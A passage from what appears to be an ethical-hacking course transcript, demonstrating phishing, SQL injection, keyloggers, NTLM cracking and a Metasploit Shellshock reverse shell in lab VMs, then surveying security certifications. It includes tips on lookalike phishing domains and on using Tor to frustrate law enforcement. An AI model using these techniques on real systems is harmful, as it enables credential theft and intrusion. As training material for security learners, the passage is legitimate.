even realize that something went wrong. But if I go back to my virtual machine, you can see that it has captured some data and it is reporting over here of what has happened. So if I just scroll up, let's see what happened here and if we have been able to capture anything. So we got a hit printing the output. This is the HTTP 1.1.200. Okay, response coming in, password field found, and we're just looking. There it is. Email someone@somewhere.com, and password that I typed in ASD@1234. So it has captured the username and the password right here. Once we are done, this is the way attackers work. Now, this is a very basic attack. Again, in the actual trainings, you would then look at how you would host this on a real website, make it a global attack. Right now, it's a virtual machine with a class C IP address. So here, the thought process is, where can we get a free hosting where we can host this kind of sites? Maybe I'll have to purchase a domain which looks like similar to Facebook or the victim that I'm trying to attack. So this is just a POC. So we just wanted to find out if we can, how phishing is done. And this is exactly how it is done, right? So pressing Control C would exit this tool and takes you back to the actual menu. Press 99 to exit, and there it is. Close the window, and that's the phishing practical. After phishing, let's talk about SQL injection. SQL injection stands for structured query language injection, which is a database attack, though it resides within the application. So it's the application vulnerability that we are trying to look at to try to bypass authentication. As the name suggests, a SQL injection vulnerability allows an attacker to inject malicious input into a SQL statement. What is a SQL statement? A query that is used by an application and is fired off to the database. Database executes that query, gets that information that is required, and sends it back to the user if the user is authenticated. So we're going to look at the SQL injection attack demo here. And what we are going to do is we are going to go back to our VMware workstation. And I've got a tool over here called OWASP, Broken Web Application, which is a utility that has been created for people like us to test our skills, to learn on how we can develop our skills further. So this has a lot of vulnerable applications built within it. We're just going to try to access it, and we're going to see if we can create a SQL injection attack. Just waiting for it to boot up. Once it boots up, it will give us an IP address. There we are. So we need to connect to 71.132. So I can just use the same browser I was using, close up Facebook, and now go to 192.168.71.132. And this is the OWASP Broken Web Application project. What we're going to do is we're going to go to Utility, and this is an application that has a lot of information within it. You can see it gives you links about what you should do, help me, video tutorials, listing of vulnerabilities that they have, and so on and so forth. So you can see we are not logged in right now. I'm just going to do this as a demo. So what we're going to do is we're going to look at this and bypass authentication. So we are taken to the login page where you need a username and password to log in. I'm going to type in test as the username and test as the password. Click on login, and you can see that account does not exist, so the authentication mechanism works. Now what we want to do is we want to create a query. Now what does a query look like? When I type in a username and a password, if I just type in a single quote here, it is going to create an error, and this is what a SQL query looks like. Select username from accounts where username is a single quote, and then the exception error happened, so it's not showing the rest of the query to us. Now what I'm going to do is I'm just going to craft a query here, single quote, and give it a condition or 1 equals 1 space hyphen space. What happens, hyphen space is comments out anything after that. So the password field is being commented out at this point in time, and I'm just giving it a condition where the condition is true. 1 does equal 1. And if this condition is true, it is going to allow me to log in. So you can see right now we are not logged in. This bypasses the authentication mechanism, and you can see user authenticated, and we are now logged in as admin. So in the training, what we need to understand as a whole is how SQL works, what are the queries that are structured with, how you can, what are the testing operators. Now, the single quote that we used, that was an operator in the SQL syntax, what these operators are, how they function, and then how you can leverage these attacks. There are different tools that are given to you in Kali as well that you can utilize. So in Kali Linux, you can just open up a command prompt, and there's a tool called SQL map. You need to give it a particular site. So SQL map -u for the URL and whatever the URL is. Now URL here, and then once you're here, you just press the enter key. This tool will craft all the queries in the background for you. You don't even have to know SQL query or SQL languages. This is a very easy tool to utilize. Sadly, I cannot demo this on a live website because that would be illegal, but you can see how you can operate this yourself. That's what SQL injections are all about. Moving on, we now talk about VPNs, virtual private networks. And a virtual private network is basically a secure network that allows me to anonymize myself over the internet. So what I'm doing is I'm connecting from here to a server that encrypts my channel, encrypts my connection, and thus allows me to keep my data secure. Now, the basic essence of a VPN or a virtual private network is to allow me this encryption mechanism where I can encrypt and safeguard my data. The added advantage that nowadays a VPN gives is that they can allow us to spoof our IP address or obfuscate our IP address so we can actually become anonymous on the internet. It can allow us to use multiple IP addresses and thus secure ourselves on the internet. For example, I use VPN called CyberGhost. And what this allows me to do is it allows me so many servers over here. If you look at the entire list, all the servers, then there are no spy servers, which and guarantee me that they are not going to keep and store any logs. And thus, they are not going to record any of the activity that I'm doing. Right? Since they are located out of Romania, this becomes a little bit more safer for me because the government and the laws over there are a little bit more relaxed than other countries. They give me different links for torrenting, for streaming, for connection features. So there are a lot of VPNs out there. So for example, let's go to the website cyberghost.com. So we can see there's a sale going on, 76% sale, or you can go on to ExpressVPN, which is also a very good VPN. Then there is NordVPN. It depends on what you want and how you want to utilize it. So just purchasing a VPN or getting a free VPN is not enough. It depends on which country the VPN originates from and which server you're connected to. For example, most of the countries have a pact where they share information amongst themselves even if you're connected to a VPN. That means that these companies that provide these services have to generate and store logs, and these logs have to be reported to the government if they ask for it. Now, if there's a list of 14 countries that actually focuses on this practice, so you have to find out VPN that and a server that is not a part of those 14 countries and ensure that those logs are not going to be reported to the government. And these are 3 VPNs basically are something that which are good, and I personally use CyberGhost. I have used the others. I just keep on rotating them just to get an idea of which one is better. So these are VPNs that can allow you to anonymize yourself on the internet. Moving on, these are the ones that we talked about. There are others: Safer VPN, Hide My Ass, ExpressVPN, and so on and so forth. From our terminologies, let's now talk about VPS. VPS is basically virtual private server where you can rent a service or server as a service, a virtual machine as a service. So basically on a cloud using infrastructure as a service, you can rent a server and utilize it for whatever activity you want. So let's go to these sites: register.com, GoDaddy, Network Solutions, or we can talk about other cloud solutions as well. So here you can get register your domain names. So in the previous exercise, for let's say when we talked about the phishing exercise, what we want is we can go on to register.com or we can go on to GoDaddy.com and we can purchase a particular domain. For example, something like this. Instead of the O's, I'm typing in a couple of zeros for the Facebook and let's see if anything of that is available. Now, something.photo is available, or facetips.com is available. There are other options that are making over here that they're giving us over here. And once we purchase this, we can then have our own hosting with a web hosting as a service. And we can have a Linux-based hosting or a Windows-based hosting depending on what you want, and that's where your shared hosting comes into the picture. If you just want, if you want to look at a virtual server and you want to rent a server over there itself, you can move on to rackspace.com, and here in your services, you can have physical server or a virtual server in a public cloud. Your other cloud providers, for example, would be Amazon, AWS, and on AWS, you can basically look at EC2, Elastic Compute Cloud, which is basically virtual servers in the cloud. And over here, you can rent out a server with whatever capacity you require. You'll obviously have to pay the rent for what those servers are going to cost. But once you have those servers, you can then launch any services on top of it. Looking at other services that we have, we talked about Tor. Tor is a onion routing software that allows users to browse the web anonymously. So we can just go online and we can try to spoof our identity, and I'm going to show you how. So I've got a VMware workstation right here, the one. So we're just going to pull that up and we're going to power on a Windows 7 machine where we're going to look at the onion routing. So our Windows machine has booted up. We're just going to log in, and this is my Windows 7 machine. Now I've got a Chrome browser right here, and we're going to go to a website called seemyip.com, which is going to give the IP address that I'm currently using. So right now I'm not connected to any VPN or anything, and you can see that's my IP address that I'm utilizing. Now if I want to anonymize myself, what I'm going to do is I am going to use Tor, and that's the Tor browser that's set up right there. If I click on it, it's going to open up the software and it's going to create a new network, and it's going to connect to the Tor network and allow me to anonymize myself. Right, so that's the Tor browser opening up and giving me a new browser over here. So I've got one, which is the old one, which is my current IP address. If I just refresh that, you'll see that I'm still on the same IP address as far as this browser is concerned. There's a refresh and it's still showing me the same IP address. Where if I go on to Tor right now, and if I go to seemyip.com, you will see that it is going to give me, and you can see the amount of time it is taking to reach that site. That's because I am using a VPN and there's a lot of encryption running off, and you can see now I'm certainly connected via Hong Kong. And even to reach this site, what Tor does is it gives me a proxy chain. A proxy chain is where it creates multiple hops to hide my identity, and before I reach seemyip.com, I am using 3 different IP addresses over here. One in France, one in Germany, and one in Hong Kong. So if I do something over here to trace back my steps to my actual IP address, the law enforcement agencies or anyone who's going to search, like a forensic investigator, would have to go through these IP addresses before they come back to me. Now it's not impossible, but the effort and time that's going to be taken to come across 3 different countries is going to be phenomenal. So it may just defeat the purpose of having so much resources spent to identify who did what. So that's what Tor does for us. Alright, moving on from Tor, we are going to look at keyloggers. Keyloggers are basically softwares that run in the background and record all the keystrokes of the user. So if I've got a keylogger installed right now, whatever I type will be stored in a text file for the hacker so that they can look at it later on. And just to give you an example of that, we go back to my VMware workstation and we open up another Windows 7 machine. I'm going to power this on, and I'm going to close this one till then. So this virtual machine has booted up. We are going to use user 1, log in as user 1, just close all these softwares which are not required. And once this machine is booted up, what we're going to do is I'm just going to open up a random websites and see what we're doing. Basically, there's a keylogger that's there in the startup that's going to record our keystrokes, and we just want to see what it actually does. Now Firefox is getting updated, so let's hold on. Now this is the latest version of Firefox, right? And we're just going to go to, let's say, facebook.com. Wait for the website to open up. Alright, let's try opening it up again. And that's facebook.com, and we're just going to type in some random username and password, someone at somewhere.com, and the password being again ASD@1234567890. Login, obviously that login is not going to work. User probably doesn't exist, or if it does, the password probably is incorrect. And so we are going to close this. We're going to, let's say, open up another browser window, go to another site, rediff.com, and then go to Rediff Mail. Try the same thing over here, someone at somewhere.com, password ASD@12345678, whatever it is. Don't say, we can see the combination is incorrect. Now there's a keylogger running in the background, and what we want is we now want to open up the keylogger. Now it is visible here because I've kept it visible. You can hide it in the start menu, and there's a shortcut key for you to pull it up later on, so this completely becomes invisible. And what it can do is it basically creates a record of whatever you have been doing so far. So you can see these things populating on the 25th of December. So if I look at the visited websites, you can see I opened up Mozilla Firefox, the first where there was a problem loading the page. Then we opened up Facebook, then we opened up rediffmail.com, and so on and so forth. So it just gives me the list of visited websites. Whereas if I look at keystrokes and clipboard, you will see whatever we have typed in. So we first typed in facebook.com, then again the second time I try to type in, then I hit backspace, then I type in facebook.com, and then you can see I typed in someone@somewhere.com, and in tab ASD@123456789. We closed up the browser, we opened up a new one, and we went on to rediffmail.com, and then you can see me typing this one, then going back one space, then the rest of what I typed, and then the password coming in. So that's what a keylogger does. If you look at the taskbar, it's not going to show you a keylogger running in the background. It's in the processes, you're not going to see anything at all, but it's going to mask itself as a service. So if you look into the properties, you can see that icon coming in over here, which matches this one. And so you can see that this is masking itself as a service.exe. If this gets hidden as well, it would be very difficult for a user to even identify this. All right, so that's what a keylogger is. Moving on, let's see what else we want to talk about. So we've talked about Tor, we've talked about keyloggers, and now we want to talk about firewalls. Now, for keyloggers to be prevented, we need antiviruses, right? So we need a good antivirus program that's going to be installed, updated, and run on a regular basis to protect ourselves from malwares. But what about network connections? And you need a firewall and a system to prevent or to detect what kind of connections are going on in the first place. Now, we cannot rely on software 100%. So even if a firewall is not configured properly, that's going to be a problem. So what we need to do is we have to have a firewall, configure it correctly, and then allow and disallow certain activity from happening. And what we're going to do is, I've got such a system on my machine here. I use a software called Glasswire. What it does is it is a network analyzer. So it allows me to analyze whatever is going on. You can see all the apps that I'm utilizing and how much upload and download they have been doing, all the traffic. So you can see the protocols that I'm utilizing. So I come to know what's going on in the background. And this gives me the entire graph of how much I have been doing for the past 24 hours, past 3 hours, past 5 minutes, and so on and so forth. Right, so this is what the activities, and these are the alerts that it has been generating. I can click on those alerts and it will start telling me what it was all about. If the graph doesn't work for me, it gives me usage as well. So how much I have utilized since I've installed this software, right? And what applications have been utilized, which hosts have been connected to, and the traffic type that was utilized. And then the things on my network. So these are the devices that I have currently on my network that have been identified. And then comes the firewall. So on the firewall is clicked on. You see all those services that have been identified, and you can just click on a particular service to lock that service. So this becomes a discovery tool, identifies whatever networking is going on, gives me all that information, and then I can look at and I can just click on any of these services that I find it as malicious and block them. I can create different profiles for different applications as and when I want them. And these are the alerts. So you can see that this was the first time a network connection was looked at from VMware. And what this allows me to do is whenever I execute a file, it can upload it to virustotal.com and scan it as a third-party antivirus to ensure that there is nothing malicious on it. So I already have an antivirus over here, but if this ever gets compromised, I still can rely on a third-party service where in real time when I execute my applications, they would be verified and I would be assured that nothing is wrong with my system. And this software that I'm utilizing, Glasswire Basic, is free, and then there are paid versions as well. It's just glasswire.com is where you're going to find this. Moving on, Rootkit. Rootkits are also malicious softwares that you allow an unauthorized user to have access to a computer to restrict areas of its software. Now, a rootkit in its sense is a malicious software that infects a machine and prevents some functionality from it, like hiding data or preventing users from running antiviruses. And it's basically a malicious software that is used to hide information from the victim so that they would not realize that they have actually been compromised. It's going to be a difficult showing of a rootkit, so I cannot show that demo to you. So we're just going to move on, and we are going to talk about ethical hacking techniques now. Now, when we say ethical hacking techniques, we want to look at what kind of audits are available when we want to do ethical hacking. So there's a black box audit, a white box audit, and a gray box audit. So if I'm invited in an organization to conduct a test, to conduct a audit, to conduct a vulnerability assessment or a penetration test, to identify vulnerabilities and then try to plug them out, they are going to give me 3 different variations. In a black box audit, they're not going to tell me about the infrastructure. They're not going to give me any information. And they want me to start from the basics of gathering information, identifying the systems, and based on the information that I gather, whether I'm able to develop any hacks and compromise their infrastructure. So it will be a simulation of a hacker who's sitting outside the organization and trying to find a way in. Whereas a white box audit is where full infrastructure knowledge is given, anything and everything that is required for an audit is given. And this is a simulation of an insider attack, a person sitting inside the organization misusing their permissions and then trying to compromise, trying to get access to data that they do not have access to. So the simulation is from a malicious insider. A gray box is where some partial knowledge is available, and from that partial knowledge you're going to try to build up more information, and then you're going to try to get access to those resources. What are the tools that we utilize? So we've already had a couple of demos on keyloggers, SQL injection, SQL map, and so on and so forth. Metasploit is a very much used tool for penetration testing, and having knowledge on Metasploit is very much necessary as far as ethical hacking is concerned. Nmap, this is a tool used for network discovery. Nessus, a vulnerability scanner. Wireshark is a packet capturer that allows you to capture packets and analyze whatever is going on. SQL map is something that we have seen, a SQL injection attack tool which generates its own queries. And John the Ripper is a password cracking tool. Backtrack used to be an operating system that was utilized for penetration testing. However, Backtrack has now been replaced by something called Kali Linux, and that's the operating system that we have utilized in all our demos, where we try to look at SQL map and those injection attacks that we did. So what are the areas of ethical hacking? We have just talked about all these areas as well. Network services, we looked at the Glasswire application that showed us how my machine is consuming networks, which protocols are being consumed, how the connections are being created. If somebody is able to install a Trojan on my machine, it is going to try to create a new connection on the network with the hacker to allow that hacker a backdoor access. Now, if I have that Glasswire or a similar firewall implemented, it is this firewall that is going to detect it and prevent that connection from happening. So if I install a software that is suddenly suspicious, or that installs something else in the background that I may not be aware of, that tool is going to identify all the connections that are being made, and it is going to highlight that connection. I need to go through all of those connections and identify whether they are legit or not. And if I find some suspicious or doubtful, I'm going to block that connection, and then I'm going to investigate what's going on. And that's where ethical hacking comes into the picture. You want to find out if your firewall that you have implemented is going to work correctly or not. If the configuration of the firewall is done properly, or if the firewall is misconfigured, is it leaking out information, right? At the same time, you're looking at web applications. We looked at the OWASP broken web application where we did some SQL injection attacks, right? So that was a weakness or a vulnerability in that application, which would allow us to bypass authentication and get access to resources that we were not authorized for. And then client-side attacks would be where you install keylogger at the end of the client system, and then you try to capture whatever data the user is typing in, like usernames and passwords on the Facebook and the rediffmail.com website that we saw, and then try to misuse that information to get access to those resources. Then Wi-Fi networks, right? Wi-Fi is something that we use on a regular basis. We got our smart devices nowadays, smartphones, tablets, phablets, that we connect to Wi-Fi and start using all our services, our banking applications on our smartphones. And thus we want to ensure that wireless connectivity is simple and is secured. So you want to use encryption mechanisms, you want to use tools on your smartphones, antiviruses, firewalls on your smartphones to ensure that whatever you are utilizing is going to remain secure. And then social engineering, we've looked at the phishing website on facebook.com. We've seen how easy it is to clone websites and host them on Apache server. So if you look at it as from an ethical hacker's perspective, the job of an ethical hacker is to simulate these kind of attacks that a hacker may conduct. And first of all, you're basically going to find out areas where these attacks can happen. Think of it from a hacker's perspective. Try to simulate those attacks and see if those attacks are going to be effective. Can those attacks be prevented? And can your current security controls that you have put in place identify, detect, and prevent these attacks from happening in the first place? And that is what ethical hacking is all about. Let's look at the Metasploit attack. Metasploit is a framework of penetration testing that makes hacking very simple. You just need to know how to utilize the tool. You need to identify the vulnerability associated with a particular exploit and then run the exploit on Metasploit. We'll be demoing this during the practical. So there are active exploits and passive exploits. Inactive exploits, it exploits a specific computer, runs until execution and then exits, uses brute force and exits when an error occurs. In a passive exploit, these exploits wait for incoming requests and exploit them as soon as they connect. They can also be used in conjunction with emails and web browsers. So in passive exploits, we create a payload, like a reverse connection payload, we send it to the victim. Once the victim installs that software, the machine will then initiate a connection to us. Our machine will be in a listen mode, and then we will, once the software is executed at their end, we would then try to connect and exploit that particular vulnerability. This is the practical that we'll be doing on Metasploit. So let's move on with the demos, and then we'll see what we can discuss amongst them. Alright, let's have a look at some of the demos that we had talked about in the ethical hacking and penetration testing module. We are going to look at 3 different demos. The first one is going to be a SQL injection attack that we are going to perform on this tool that we have. The second one is a password cracking attack on Windows 7. And the third one is a MetaBreeder based or a Metasploit based shell shock attack on a Linux based web server. So let's get cracking. I've powered on this virtual machine, which is the OWASP Broken Web application. It is a tool that is provided for people who want to enhance their skills, and they can practice how to do these attacks in a legal manner. So we are going to go to this site. I'm just going to open up my browser. The IP address is 71.132, and that's the OWASP Broken Web application that we want to utilize. We are going to head off to Mutility 2. And we are going to look at a SQL injection attack where we want to bypass authentication. Now this takes us to the login screen. So we can just try our luck here and see that the authentication mechanism works. The account does not exist. So the username and password that we have supplied is not the correct one. So we want to ensure that there's a SQL database, and we can try to attack it and see if we can bypass the authentication. Now, what we want to do is we want to create a SQL based malformed query that can give us a different output. So I'm just going to type in a single quote over here and type login, and you can see that this is now suddenly recognized as a operator, and there's an error that is given out compared to the login that we tried earlier. When we used a proper text-based login mechanism, it gave us the account does not exist, but here the single quote gave us an error, and it shows us how SQL works. This is the query that we had created. Now, in the trainings that you have for ethical hacking, there would be explanations of what these queries are all about, how the syntax works. Here we're just going to see if we can create a malformed query to log in as a user in this case. So what I'm going to do is create the query over here, and we're going to give it a comparison. So we're going to give it a OR 1 equals 1 space hyphen space. And if you now click login, you should be able to bypass authentication, and you can see user has been authenticated, and we now have admin access to this application. Now here the SQL queries need to be crafted in such a perspective that they're going to work. So there would be a lot of exercise in identifying what the database is. There's a Microsoft database, an Oracle database, and so on and so forth, and then you have to choose those proper commands. But identifying that would come in the training. Right now we're just looking at a demo. This is how a SQL injection attack works. Now let me log out here. Similarly, now we are in a login page. The same query worked wonders where it allowed us to bypass authentication. So it also depends on what kind of a page I am and what query would be accepted at this point in time. So here application understanding would also come into the picture, where which function we are calling upon when we are connected to a particular page. Now this is a user lookup function, right? So again here we try the same method, test. That's not going to work. Authentication error, bad user on password. And if we type in the same query over here, single quote or, and give it a condition, single quote or 1 equals 1 space hyphen space. Now here it is not going to log us in because this is not a login page. This is a user lookup form. So here it would instead give us a dump of all the databases that it has. So you can see all the usernames and passwords coming in that are stored in the user lookup field. So this is where the understanding comes in of which query to create at what page, depending upon the function that is being called, right? So that's the SQL injection attack that we wanted to look at. Let's move on to password cracking. Now this is a Windows 7 machine that we have. I'm just going to do a very basic password cracking example. We're just going to log in. Now here the assumption is that we are able to log in. We have access to a computer, and we want to check out other users who are using this computer and see if we can find out their passwords, so that we can log in as a different user, steal data if required, and we wouldn't be to blame if there are any logs that are created. So here we've got a tool called Kane-Enable that is installed right here. Now I'm already an administrator on this machine. I'm checking out other administrators who share the same privileges, or any other user who may be on this system whose password I can crack, and thus I would be able to get access through their account and then do any malicious activity, right? So this allows me to go into a cracker tool, and it allows me to enumerate this machine and identify all the users and passwords that are there in this particular machine, right? So I'm just going to click on the plus sign and I'm going to import hashes from a local system. So where are these files stored? Where does Windows store its passwords? In what format are they stored? And what this tool does to retrieve those? That's something that we all need to know as an ethical hacker, right? So import the hashes from the local system, click on next. It's going to enumerate that file and it is going to give you a list of all the users that are there. So you can see the users are HackerAdmin, test, the one that we are logged in as, and then there's a user called virus as well. And you can see that this is the hash value of the password that is being utilized. Now there's a particular format for a hash value for Windows and how it stores. But once we have these hash values, let's say if I want to crack this password, there are various attacks that we can do. For example, a dictionary based attack or a brute force attack. Let's try a brute force attack, right? NTLM is the hashing mechanism that is used by Windows. So we're going to try to create an NTLM hash attack. And here we are going to use a predetermined rule set. For example, we are not sure what characters are being utilized over here. So we just create an attack like this using all characters and lowercase a through z, uppercase a through z, numeric 0 through 9, and all the special characters. Let's say the password is between 7 and 16 characters. And this is the character set that we want to try the brute force attack on. What is a brute force attack? It is an attack where the computer is going to try each and every permutation and combination out of this character set and try to figure out if the password is going to be correct. So if we click start, it's going to start with a particular characters, and then it is going to identify if that NTLM hash is going to work against this character. And you can see the time is going to be phenomenal over here. So it's not necessary that this attack would be viable. It will be 100% successful given the time frame. However, the time frame is huge enough for this attack to become a little bit redundant. There are other attacks that we can do which can easily identify this data for us as well, but that is something that we will look on in future videos. So that's how we can get access to users and passwords. There are different mechanisms where, let's say we don't have login access, then what are we going to do? How we can create a fake user, login, or how we can remotely access a machine and then try to get the same access. And that is what we are going to try to do in the next demo on a Linux machine. So what we are doing in a Linux machine could also be doable on the Windows machine with a different exploit. So what I'm going to do is, this is the Linux web server that I have that I'm going to power on. I'm going to use a Kali Linux machine to hack that device, and I'm going to just power off my Windows 7 machine. Give it a minute till it boots up. Now this is also a demo machine that we have which has its own pre-configured vulnerabilities. So here we've got something from the pen testers lab and has a shell shock vulnerability implemented inside. Shell shock vulnerability affects Linux, Mac, and Unix based operating systems for a particular version of the bash shell. Bash is the born again shell, which is the command line interface in these operating systems. So what we are trying to do here is we are going to use the Kali Linux machine, try to find out the vulnerability over here, and if it exists, we are going to use Metasploit to attack this machine. Now the first and foremost thing is we want to identify the IP address. We have no idea what the IP address is. We are in the same subnet, so we are assuming that we are able to connect to this machine. So what I'm going to do is I'm going to open up a tool called ZenMap. I'm going to open up a command line interface, find out what my IP address is, and my IP address is this with a subnet mask of 255.255.255.0. So I want to see if there are any other machines that are live in the same subnet, and we are doing a ping sweep over here to identify which machines are live. In a minute we'll get all the IP addresses. 71.1, 2, 133, 254, and 128. We know that we are 128 at this point in time. 254 is the DHCP server. So we are assuming that 133 is the machine that we want to look at. And let's then try to see if we can scan that machine. 133, and we're going to do an intent scan to find out which ports are open, what services are running over there, and if it is whether the pentest machine that we were looking for. You can see of the start port 22 and port 80, and somewhere here, it's going to give us the ports that are open and the details about those ports, and somewhere here it will tell us that this is the Pentester lab machine that we wanted, which is correct. So now we want to do a vulnerability analysis on this. What we are going to do is I'm going to use another GUI based tool called Sparta, which I can just find out from here. Sparta uses two tools in the background, a Nmap tool and a tool called Nikto. So we're just going to start scanning. 192.168.71.133 was the IP address. Add to scope, and over a period of time you can see all of these will start populating with information. There we are. That's the Nikto tool coming in, scanning on port 80, which means that it's a web server using HTTP. It tells us it's an Apache HTTPD 2.2.21, and gives us the 22 port number as well. If we head over to the tab of Nikto, or let's look at the screenshot first. This is what the website would be looking like, and Nikto gives us the options over here. It tells us that there is a vulnerability over here for shell shock, and this is the path where the vulnerability is going to exist. So what we are going to do, we go back to the command line, we open up a new one, minimize all these other windows, and we are going to open up Metasploit. Metasploit is a penetration testing tool that is used by most hackers and ethical hackers to test applications and test existing exploits and vulnerabilities. So just give it a minute till it starts. You can see there are already around 1700 exploits right here. We are going to see all those exploits with these commands. There we are, sorry for the typo. And it will just give us a list of all the exploits that are stored in Metasploit in this version. So all of these are Windows based. If we scroll up, we will be looking at other vulnerabilities as well, or exploits, the Unix based exploits, Linux, OS X, multi-exploits. And we are looking for a exploit for multi-based Apache or HTTP. Let's go up, let's look at, so this is the one that we are looking for, Apache mod CGI bash environmental executable. So what we're going to do is we're just going to copy it, go back to the bottom, say use exploit, and paste the one that we wanted. Press enter, say show options. So it will ask us to configure this. I'm just going to configure it based on the knowledge that we have. Set our host, which is the remote host, the victim's machine. So we put in the IP address. It asks us for the target URI. So that's the path that we saw. Set target URI to cgi-bin/status. Enter. Now with the exploit, we need to find a payload that is going to give us the output that we want. So we say show payloads, and it will give us a list of all the compatible payloads with this exploit. And we want to create a reverse TCP connection, which is this. So we know it's a Linux operating system. We want this payload to be set. So set payload. Press enter. That's the payload coming in. Show options. Now that we have set the payload, this is the options for the exploit, and now we want to set our options for the payloads as well. So we are creating a reverse TCP connection, which means we are remotely executing code at the victim side and making the victim connect back to our machine, which means we need to set up a listener. So I need to put my IP address over here, set localhost or lhost 192.168.71.128, which was our IP address. Show options again, just to ensure everything is fine, which looks like it is, and we then type in the word exploit so that it will start this attack. I can see that it has created a Meterpreter session at the victim side, and it has opened up a session. So if I do a pwd, now pwd is a Linux command for present working directory, and it will show us that we'll connect it to var www cgi-bin. Do an ls, it will list all the files. That's the status file over there. Do a cd /, it will take us to the root of this machine. Now remember, we saw the passwords on a Windows machine. Similarly, we can head over to the cd etc folder, ls, and you can see these files, psswd and shadow. Now psswd is the file where Linux stores its usernames, and shadow is the file where passwords are shown. So do a cat command, psswd, and you can see these users coming up. So you can see the last user, Pentest Lab, and you can see there are no passwords. So let's do a cat shadow, and that's your hash value for the password that we have for the user Pentest Lab. So these are the different attacks that we need to understand and we need to create based on the vulnerabilities that exist on different machines. So if we just looked at Windows and Linux and how we can exploit them depending on existing vulnerabilities. As an ethical hacker, this is what we need to learn in our trainings, and then we need to clear our exams based on this knowledge of how these things work, so that we get certified, and then we can position ourselves for the penetration testing jobs. So, importance of a cybersecurity certification. First and foremost, when I see a certification, I look at it from three different aspects. The first is the training itself, which allows me to gain the knowledge, which allows me to understand the aspects of security or whatever the certification is there for. The second aspect is the exam itself. How do I need to prepare myself for the exam, and how do I need to approach the exam? How do I need to ensure that I pass in my first attempt? And the third aspect is the certification itself, which allows me to be eligible to apply for a particular job role. So, obtaining a cybersecurity certification ensures or shows to the organization that you're applying to that you do have that prerequisite knowledge and you should be shortlisted for an interview. The knowledge that you have gained during the training will help you when you attend that interview and when you attempt to answer the questions asked to you. So, these certifications are designed for a specific role. For example, a forensic investigation certificate will teach you how to investigate a crime scene forensically, a digital crime scene for a matter of fact. A certified ethical hacking course will teach you about penetration testing. So, it is you who's going to decide which certification you require and then attempt get certified on it. Of course, a fresher with a cybersecurity certification will have better employment opportunities because they can showcase their knowledge with the certification that they already have. Even professionals who want to enhance their careers can get into managerial or advanced certifications to improve on their knowledge and get promoted in their job profiles. So, cybersecurity certifications can be classified in three different aspects. The first one being the foundational level, then the managerial level, and the advanced level. In the previous video, we just had a small overview. Here we are going to discuss about what the certification covers, how the exams are conducted, and the price points for each and every exam. So let's start with the foundational certifications. We start off with CCNA, which is the basic certification for networking. So the CCNA routing and switching certification, basically it helps you build your networking career. You will join an organization as a networking engineer where you can help the organization establish their routing, the pathing of how data packets will travel across the network. This certification covers all the basic concepts that you require to understand networking. The basic requirements for this certification are that the candidate must have a bachelor's degree, but apart from that, there are no other prerequisites. So it's just that you need a bachelor's degree and then you can apply, you can study for this, you can undergo a training, and then you can attempt the exam. The certification provider obviously is Cisco, so the knowledge that is limited to this training and certification is for Cisco devices only. The exam fees for this certification is approximately $325. The exam, when it is conducted, it has around 50 to 60 odd questions which need to be answered in 90 minutes. The type of questions that you're going to get is multiple choice questions where you have a question and 4 answers and you have to choose the correct answers among those. Drag and drop, where you have to click on an object and drag it to its appropriate place, probably an architectural diagram, and you have to, let's say, pick on a router and place it into a particular position. If you place it correctly, you answer the question correctly, otherwise it's wrong. And a simulator where there could be a configuration, you need to configure it in a particular manner and then check whether the configuration is correct or not. The pass mark is around 800 to 850 out of a possible 1000 marks. So each question will have a different weightage depending on the depth of the question, depending on the difficult level of the question or the difficulty level of the question, which would then count towards your marks. And if you score 800 to 850, that's when you clear the exam. The job roles, as we have discussed over here, would be more on the network administrator side or a network engineer side, depending on the level of experience that you have. The salaries that are expected from these job roles in the US are around $55,000 to $90,000 annually. The next one is the CompTIA certification called Security Plus. CompTIA is also a global certification authority for InfoSec courses. So this certification teaches candidates on how to secure applications, networks, and devices. It focuses on hands-on practical skills in the field of network security. I have trained people on this certification myself, so I know this certification is quite hands-on. It deals with the concepts to the core. It helps you understand the concepts, and then in the practical hands-on demo, you need to execute the practical yourself so that you can gain that knowledge. The recommended level for a candidate to attempt this training would be at least around 2 years of experience in the IT sector. In addition, if you have already been certified for Network Plus certification from CompTIA, which is the baseline networking certification, this is also a preferred way to go for this certification.
As said, CompTIA is the certificate provider, and the exam fees for this certification is $339. The exam is quite simple, 90 questions in 90 minutes. That's 1 minute per question. It sounds like a lot of time, but believe me, the questions can be a little bit confusing, can be a little bit lengthy, so you will require all those 90 minutes to answer those questions, especially when they're tricky and they're technical in nature. The questions would be multiple choice and performance based. The pass mark for this exam is around 750 points out of a possible 900. The job profiles for this kind of a certification is when you want to apply for a security analyst position or a security engineer's position, where you're going to analyze some data to understand and figure out what problems are ongoing in the organization. The average annual salary of this person would be around $72,000. Then comes the CEH, or the Certified Ethical Hacker training from EC Council. Now, this is a very well-known course, and also EC Council is a global certifying authority, very well accepted across a lot of countries. This is an offensive certification. So here you're basically trying to become a penetration tester. You're taught how to hack, you're taught how to attack a particular organization from an ethical hacker's perspective. So the job profiles that you'll be looking here are of a pen tester, where you go into an organization, you test their security controls, or you test their devices, find out flaws within them, and then provide recommendations of how to plug those flaws or mitigate those flaws and improve the security of that organization. It is recommended that you have 2 years of experience at least in networking or security for these to attempt this kind of trainings and certifications. Again, a basic understanding of networking, maybe a little bit of applications, operating systems would be necessary before attempting this certification. The certification provider is EC Council, and the exam fees for this certification is $500. So the exam here would be 125 questions, which needs to be attempted in 4 hours, and you will only get multiple choice questions in here. Now for CEH, there are 2 exams. One is the multiple choice questions, and the second is a practical exam where you need to solve some given problems to you in an iLab scenario, and if you are able to solve them properly, you then get certified for CEH practical. The cutoff varies from 65 to 85% depending on the questions that you have answered and the weightage associated with each and every question. As said, the job roles would be as a penetration tester or a security engineer, and your salaries would start from around $90,000 annually. Then comes the CND, or the Certified Network Defender, also from EC Council. Now this is more on the network defense side. So here again the job roles would be where there's a network that you have, and you're going to try to secure the network and the communications that are going to travel over the network. So you need to be a network administrator, a network security engineer, or in a similar profile to understand how networks work, and then you're going to attempt to secure those networks. The certificate provider again is EC Council, and the certification is placed a little bit below CEH. So it becomes network, defense, then CEH, where you're going to become a penetration tester. The exam fees for this certification is $350. The exam is of 100 questions to be answered in 4 hours. Again, it's just a multiple choice questions. So you get a question with 4 options, you answer the correct one, and you move on to the next question. The pass percentage again varies from 60 to 85% depending on the questions answered and the weightage of that question. Job roles to be applied: network defense technician, CND analyst, or a security analyst from a network perspective. Salaries would range from $65,000 to $75,000 per annum. Then comes the forensic investigator course, which is exactly what it is: digital forensic investigator. This will help you understand how computers work, where data is stored, and how you can retrieve that data to investigate a crime that has 